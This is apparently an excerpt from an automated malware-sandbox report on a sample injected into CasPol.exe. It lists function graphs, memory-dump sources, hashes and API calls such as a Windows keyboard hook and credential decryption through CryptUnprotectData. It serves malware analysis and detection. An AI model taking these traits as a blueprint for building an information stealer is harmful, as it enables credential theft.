11211->11126 11215 10f3045-10f3048 11211->11215 11212->11116 11221 10f2fc2-10f2fc5 11212->11221 11215->11127 11215->11140 11225 10f2f8c 11217->11225 11218->11225 11219->11199 11248 10f2f15-10f2f28 11220->11248 11249 10f2f01-10f2f13 11220->11249 11221->11116 11226 10f2fcb-10f2fce 11221->11226 11225->11219 11226->11116 11234 10f2fd4-10f2fe0 11226->11234 11229->11115 11230->11129 11236 10f2c90-10f2c9a 11230->11236 11231->11215 11234->11211 11236->11229 11267 10f2d80 call ff25b8 11239->11267 11268 10f2d80 call ff25b4 11239->11268 11247 10f2d85-10f2d8a call 10f3f80 11240->11247 11251 10f2d90-10f2da0 11247->11251 11253 10f2f30 11248->11253 11249->11253 11251->11129 11256 10f2da6-10f2daa 11251->11256 11253->11164 11256->11145 11262->11129 11263 10f3156-10f315e 11262->11263 11263->11129 11264 10f3160-10f3174 11263->11264 11269 10f3176 call c4deb0 11264->11269 11270 10f3176 call c4deab 11264->11270 11265 10f317b 11265->11180 11267->11247 11268->11247 11269->11265 11270->11265
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: j
                                                                                                    • API String ID: 0-2137352139
                                                                                                    • Opcode ID: effe18f8cce221b04cdfd2c6c910910ea487b0515f1a762c733ddbdf3bc61b35
                                                                                                    • Instruction ID: 3138f00aade2b3b8d170930c730469d46bce387350d534b6cf840bcf9e5d57f8
                                                                                                    • Opcode Fuzzy Hash: effe18f8cce221b04cdfd2c6c910910ea487b0515f1a762c733ddbdf3bc61b35
                                                                                                    • Instruction Fuzzy Hash: 18029330B002089BEB55DBA8C855BADBBF2BF89314F14846DE245EF695CB74DC44CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110D7C0, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0110DF33
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HookWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2559412058-0
                                                                                                    • Opcode ID: fa57c42a12ed02736c2ff65fb950a3423d98a9d3bd5df47f6b7bf4cfd064031e
                                                                                                    • Instruction ID: 8ece917f34f3af5fd9cec2df9d388395cc53c318f79dbbcb27255d12e554626c
                                                                                                    • Opcode Fuzzy Hash: fa57c42a12ed02736c2ff65fb950a3423d98a9d3bd5df47f6b7bf4cfd064031e
                                                                                                    • Instruction Fuzzy Hash: 1E21F5B1D042189FCB14CFD9D844BEEBBF4AF88314F108429E555A7250CBB4A944CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 011033C0, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0110342D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 834300711-0
                                                                                                    • Opcode ID: 2d8a0ef54877ffc6950abde3acf67c97f2663af659bab83e917f402519f69d37
                                                                                                    • Instruction ID: 71a93bec4c4b8fc5702469143ee22243a4a32b4967180dd57b6db5ef855f2bd9
                                                                                                    • Opcode Fuzzy Hash: 2d8a0ef54877ffc6950abde3acf67c97f2663af659bab83e917f402519f69d37
                                                                                                    • Instruction Fuzzy Hash: CF1159B68002099FCF11CFA9C845BDEBFF4EF88310F14841AE664A7651C379A654CFA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 01102C6C, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0110342D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 834300711-0
                                                                                                    • Opcode ID: 1d36bca422e34cdac510c7138da21af5aa1eaa397128626019d7c9001f9bc2a0
                                                                                                    • Instruction ID: 987051209a71ab680bdcb23695971b6f14f2b0a6ef1ea39d1798ebcd39ed286f
                                                                                                    • Opcode Fuzzy Hash: 1d36bca422e34cdac510c7138da21af5aa1eaa397128626019d7c9001f9bc2a0
                                                                                                    • Instruction Fuzzy Hash: 281117B68002099FDF11CF99C944BDEBBF4EF49310F148419E654A7250C775AA54CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F67C0, Relevance: .4, Instructions: 391COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33655220a54813115e9ecd759add97099163dce4d7b2e886e786bdabb2a240b7
                                                                                                    • Instruction ID: 976f8756c92f655df584c57a4a4eb4ef72df3e723f193d6e948ae33d1e36b894
                                                                                                    • Opcode Fuzzy Hash: 33655220a54813115e9ecd759add97099163dce4d7b2e886e786bdabb2a240b7
                                                                                                    • Instruction Fuzzy Hash: 78D1E374F002085BEB149BB48895BAE7AE6AFC9744F158C2CE246DB3D4DF75AC0187D2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCE4EF0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 304COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 285 1dce4ef0-1dce4f16 288 1dce4f18-1dce4f2f 285->288 289 1dce4f67-1dce4f6f 285->289 294 1dce4f39 288->294 295 1dce4f31-1dce4f37 288->295 290 1dce4fb5-1dce4ffe call 1dce42ac 289->290 291 1dce4f71-1dce4f76 call 1dce42a0 289->291 314 1dce51ab-1dce51dd 290->314 315 1dce5004-1dce504f 290->315 297 1dce4f7b-1dce4fb0 291->297 298 1dce4f3f-1dce4f45 call 1dce32bc 294->298 295->298 306 1dce5052-1dce50ab call 1dce32bc call 1dce42b8 297->306 302 1dce4f4a-1dce4f61 call 1dce4294 298->302 302->289 309 1dce517d-1dce51a4 302->309 337 1dce50b0-1dce50b4 306->337 309->314 333 1dce51e4-1dce5290 314->333 315->306 346 1dce5298-1dce52c3 GetModuleHandleW 333->346 347 1dce5292-1dce5295 333->347 339 1dce50ba-1dce50c7 337->339 340 1dce5171-1dce517c 337->340 343 1dce516d-1dce516f 339->343 344 1dce50cd-1dce50fa call 1dce32bc call 1dce42ac 339->344 343->333 343->340 344->343 357 1dce50fc-1dce510a 344->357 348 1dce52cc-1dce52e0 346->348 349 1dce52c5-1dce52cb 346->349 347->346 349->348 357->343 358 1dce510c-1dce5123 call 1dce32bc call 1dce42c4 357->358 363 1dce5125-1dce512e call 1dce42b8 358->363 364 1dce5130-1dce515f call 1dce42b8 358->364 363->343 364->343 372 1dce5161-1dce516b 364->372 372->343 372->364
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 1DCE52B6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID: #&
                                                                                                    • API String ID: 4139908857-2291492352
                                                                                                    • Opcode ID: c80f65b68dd61ffad6e612de111a809eecb60b3f846334abc99c2db4be492fe4
                                                                                                    • Instruction ID: 62c5faeaf0c73a22468161c850d1ba6949a7fe7be998995bc1a4dda0672c35e0
                                                                                                    • Opcode Fuzzy Hash: c80f65b68dd61ffad6e612de111a809eecb60b3f846334abc99c2db4be492fe4
                                                                                                    • Instruction Fuzzy Hash: E9C1ADB4B047498FCB05DFB9C8849AEBBF5BF88204B01896DD44ADB751DB74F8018B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49959, Relevance: 2.1, APIs: 1, Instructions: 631libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 53ff54435baabd5f177d20106062ac064daa0d6c55e17c628d1c6a6f9591b42d
                                                                                                    • Instruction ID: c1f6db46d3b74370b69836f82b9cc6c7faca7f201a2bc68ab72f9b0b3e7e5e22
                                                                                                    • Opcode Fuzzy Hash: 53ff54435baabd5f177d20106062ac064daa0d6c55e17c628d1c6a6f9591b42d
                                                                                                    • Instruction Fuzzy Hash: A75229B4A09228CFCB64DF70C89469DB7B6BF88305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C4999E, Relevance: 2.1, APIs: 1, Instructions: 624libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4f7c8d32261aa52454a877d291d667de2b350fe0fa69ec0b2229f42ba11ebb36
                                                                                                    • Instruction ID: 8ccee23e9ee42884132e1be7ce276b8bbf9d73ad81b63f7748145f071c7555fb
                                                                                                    • Opcode Fuzzy Hash: 4f7c8d32261aa52454a877d291d667de2b350fe0fa69ec0b2229f42ba11ebb36
                                                                                                    • Instruction Fuzzy Hash: A4521AB4A09228CFCB64DF70C89469DB7B6BF88305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C499E3, Relevance: 2.1, APIs: 1, Instructions: 617libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 18437a8aa1a7826c1a93a120dfbdcce9a86f34a64cc3468db942d5a8ec44153e
                                                                                                    • Instruction ID: f819b8d2db7778e6e04a7a9f12d2b0731f3cb1153b452103dabb5615b6d2ea0b
                                                                                                    • Opcode Fuzzy Hash: 18437a8aa1a7826c1a93a120dfbdcce9a86f34a64cc3468db942d5a8ec44153e
                                                                                                    • Instruction Fuzzy Hash: 73522AB4A09228CFCB64DF70C89469DB7B6BF48305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49A28, Relevance: 2.1, APIs: 1, Instructions: 610libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: e79c92255cfede413879dad7c0a45a5cc525d4155f447933b8df2deb4b73fd93
                                                                                                    • Instruction ID: 38ee53f9ed95b5a44289f2a7bfc7d8a055e00fa23a3789991b7bfbd02f8378d8
                                                                                                    • Opcode Fuzzy Hash: e79c92255cfede413879dad7c0a45a5cc525d4155f447933b8df2deb4b73fd93
                                                                                                    • Instruction Fuzzy Hash: 7B522AB4A09228CFCB64DF70C89469DB7B6BF88305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49A6D, Relevance: 2.1, APIs: 1, Instructions: 603libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 32c4d165a5c6fb70f1831fe2765a77c745eb5b648dc8f3c577774289f33f6993
                                                                                                    • Instruction ID: edbeeac8f42005e33b227a66392c56b7b9d20d11adacac717cac4423b763d771
                                                                                                    • Opcode Fuzzy Hash: 32c4d165a5c6fb70f1831fe2765a77c745eb5b648dc8f3c577774289f33f6993
                                                                                                    • Instruction Fuzzy Hash: 3B522BB4A09228CFCB64DF70C89469DB7B6BF88305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49AB2, Relevance: 2.1, APIs: 1, Instructions: 596libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 1589f913802b5b37ee4a47988e51c2aff6155febf55ebeb9ccfd4804155775e2
                                                                                                    • Instruction ID: f24616c15814ef730ecb065955cce7b20d51c1a069acab423f774006f02981eb
                                                                                                    • Opcode Fuzzy Hash: 1589f913802b5b37ee4a47988e51c2aff6155febf55ebeb9ccfd4804155775e2
                                                                                                    • Instruction Fuzzy Hash: F9522BB4A09228CFCB64DF70C89469DB7B6BF88305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49B0D, Relevance: 2.1, APIs: 1, Instructions: 585libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: e1d5b22f39e3b804b95785b8082cae2356edc1bda8d55217d7d976afc1424e6a
                                                                                                    • Instruction ID: 1e2a8aa280a832adfc72a579274786e649e8555230c7ac5c7babd2f64de15f21
                                                                                                    • Opcode Fuzzy Hash: e1d5b22f39e3b804b95785b8082cae2356edc1bda8d55217d7d976afc1424e6a
                                                                                                    • Instruction Fuzzy Hash: 75423BB4A09224CFCB64DF70C89869DB7B6BF88305F2085EAD549A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49B52, Relevance: 2.1, APIs: 1, Instructions: 578libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 511806a5102153a09ec91dac820adbfdce094ff4c0868aa109a69d019b475b1d
                                                                                                    • Instruction ID: 2c6e82dcba5e145cad7f7343fd436d6a27f968b4fb75dc55eb0ba819cb78948a
                                                                                                    • Opcode Fuzzy Hash: 511806a5102153a09ec91dac820adbfdce094ff4c0868aa109a69d019b475b1d
                                                                                                    • Instruction Fuzzy Hash: 17423CB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49B97, Relevance: 2.1, APIs: 1, Instructions: 571libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 80d5e0e85abafbccf726ee58ad2c75f616f4cb2b302c70c4e9f2107562489fc7
                                                                                                    • Instruction ID: 72bd5c7aef0b9cea0fb77f7fe92deb8cb86d6c1978204c96c92caefd9a913da7
                                                                                                    • Opcode Fuzzy Hash: 80d5e0e85abafbccf726ee58ad2c75f616f4cb2b302c70c4e9f2107562489fc7
                                                                                                    • Instruction Fuzzy Hash: 9C423BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49BDC, Relevance: 2.1, APIs: 1, Instructions: 564libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: b5f0e574d3ad8d2b01e0290ac403c73e286739215042614018d31cd586d34e81
                                                                                                    • Instruction ID: 921db35918aed966ed85123dc73be07042516c49c485e9d7702da85e011db8f7
                                                                                                    • Opcode Fuzzy Hash: b5f0e574d3ad8d2b01e0290ac403c73e286739215042614018d31cd586d34e81
                                                                                                    • Instruction Fuzzy Hash: 63423BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49C21, Relevance: 2.1, APIs: 1, Instructions: 557libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 8012d92caa83d1e1d0f4b245552bdd9ea7b0fa22f4ffa13dd543ea5a6f0a1031
                                                                                                    • Instruction ID: 3ef81547f316b63679b4f3b74831fe07168cc39788d42073109bb5f9a3349f5f
                                                                                                    • Opcode Fuzzy Hash: 8012d92caa83d1e1d0f4b245552bdd9ea7b0fa22f4ffa13dd543ea5a6f0a1031
                                                                                                    • Instruction Fuzzy Hash: B0422BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49C66, Relevance: 2.0, APIs: 1, Instructions: 550libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: e35c36730e359fa0cbbd39b17ae42a990cfa562deef2bee6275f3b65baaad790
                                                                                                    • Instruction ID: 217c6816fb1a7146373f89aaa2c69b0181247d57c1c9b77b607b44779820fb3b
                                                                                                    • Opcode Fuzzy Hash: e35c36730e359fa0cbbd39b17ae42a990cfa562deef2bee6275f3b65baaad790
                                                                                                    • Instruction Fuzzy Hash: 78422CB4A09224CFCB64EF70C89869DB7B6BF48305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49CAB, Relevance: 2.0, APIs: 1, Instructions: 543libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a5b2a9983a934368c34775ad4f29a2af5dbb40f30264040bdeb350d980c72a54
                                                                                                    • Instruction ID: 5d5378431d1aedb7d1cf2fc8f1f6149287de7296cfaa86ce6cf1ae6980f57fb8
                                                                                                    • Opcode Fuzzy Hash: a5b2a9983a934368c34775ad4f29a2af5dbb40f30264040bdeb350d980c72a54
                                                                                                    • Instruction Fuzzy Hash: 00421AB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49CF0, Relevance: 2.0, APIs: 1, Instructions: 536libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: f88a50fe301b9d7c9b1942b76d2e4899d48c736fe06e2e8a34337ac5c2059478
                                                                                                    • Instruction ID: 6aa707b13a090ef6edc3b246d05d191ed7a6f7d3bda0e22d7bcf33dc17752f5b
                                                                                                    • Opcode Fuzzy Hash: f88a50fe301b9d7c9b1942b76d2e4899d48c736fe06e2e8a34337ac5c2059478
                                                                                                    • Instruction Fuzzy Hash: 7E322BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49D35, Relevance: 2.0, APIs: 1, Instructions: 529libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 98bf313b67575af1010f5a7fdc1bf4b2595a00a06abd6b67cb5e34937eec35ab
                                                                                                    • Instruction ID: 0b98059c01e9bd80531d31c4b2d8577bf390f715dbcdab5da1c31987056cd577
                                                                                                    • Opcode Fuzzy Hash: 98bf313b67575af1010f5a7fdc1bf4b2595a00a06abd6b67cb5e34937eec35ab
                                                                                                    • Instruction Fuzzy Hash: 62322BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49D7A, Relevance: 2.0, APIs: 1, Instructions: 522libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 6fc16db0ad3bd3ac410cc1177c5714116bbf9d297fb7302f3efe41fe347742a8
                                                                                                    • Instruction ID: 5f75b53c5ff03371f94ad5f012a792b018b92bfca4b286f420dd8e32d02114b3
                                                                                                    • Opcode Fuzzy Hash: 6fc16db0ad3bd3ac410cc1177c5714116bbf9d297fb7302f3efe41fe347742a8
                                                                                                    • Instruction Fuzzy Hash: AB322CB4A09224CFCB64EF70C89869DB7B6BF48305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49DBF, Relevance: 2.0, APIs: 1, Instructions: 513libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 35b39d7eb31ac5decb3dc26b1d6cce5e6ce41302be21c66784a3997ef1666a2c
                                                                                                    • Instruction ID: 04851859579c34f97c3ac06d0d3646805d3161a79a4fe228d3f28aac17990556
                                                                                                    • Opcode Fuzzy Hash: 35b39d7eb31ac5decb3dc26b1d6cce5e6ce41302be21c66784a3997ef1666a2c
                                                                                                    • Instruction Fuzzy Hash: 01322BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49DFB, Relevance: 2.0, APIs: 1, Instructions: 506libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 30f457c47ac0ffca2f0bf3012a73ee035600091deee14016938e11b57aacd546
